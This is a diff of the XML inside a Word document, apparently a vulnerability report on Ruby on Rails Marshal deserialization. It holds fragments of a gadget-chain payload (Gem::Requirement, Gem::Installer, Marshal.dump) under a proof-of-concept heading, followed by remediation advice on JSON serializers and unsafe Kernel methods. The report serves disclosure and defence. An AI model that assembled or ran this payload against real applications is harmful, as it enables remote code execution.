+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -1309,16 +1046,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>('@io', n)</w:t>
+        <w:t>_variable_set('@io', n)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1346,7 +1074,6 @@
         </w:rPr>
         <w:t>Gem::</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -1356,17 +1083,15 @@
         </w:rPr>
         <w:t>Requirement.allocate</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -1383,51 +1108,24 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>('@requirements', t)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">payload = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Marshal.dump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>([</w:t>
+        <w:t>_variable_set('@requirements', t)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>payload = Marshal.dump([</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -1438,7 +1136,6 @@
         </w:rPr>
         <w:t>Gem::</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -1446,16 +1143,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>SpecFetcher</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>, Gem::Installer, r])</w:t>
+        <w:t>SpecFetcher, Gem::Installer, r])</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1497,6 +1185,87 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31208BF1" wp14:editId="3010D09C">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>530225</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="3676650" cy="1745615"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1806898473" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1806898473" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3676650" cy="1745615"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>PROOF OF CONCEPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>REMEDIATION</w:t>
       </w:r>
     </w:p>
@@ -1531,7 +1300,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> Ensure that your Ruby on Rails application is configured securely. This means ensuring that potentially harmful configurations like </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -1548,16 +1316,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_dispatch.cookies_serializer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> are set to JSON rather than Marshal, which is the Ruby object serialization format. The JSON serializer does not allow object deserialization and is a safer option.</w:t>
+        <w:t>_dispatch.cookies_serializer are set to JSON rather than Marshal, which is the Ruby object serialization format. The JSON serializer does not allow object deserialization and is a safer option.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1581,7 +1340,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Disable Unsafe Methods:</w:t>
       </w:r>
       <w:r>
@@ -1590,61 +1348,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Ensure that potentially harmful methods like </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Kernel.eval</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Kernel.load</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, or </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Kernel.system</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> are not directly callable by deserialized objects. Consider using a secure coding library or framework that disables or sandboxes these methods.</w:t>
+        <w:t xml:space="preserve"> Ensure that potentially harmful methods like Kernel.eval, Kernel.load, or Kernel.system are not directly callable by deserialized objects. Consider using a secure coding library or framework that disables or sandboxes these methods.</w:t>
       </w:r>
     </w:p>
     <w:p>
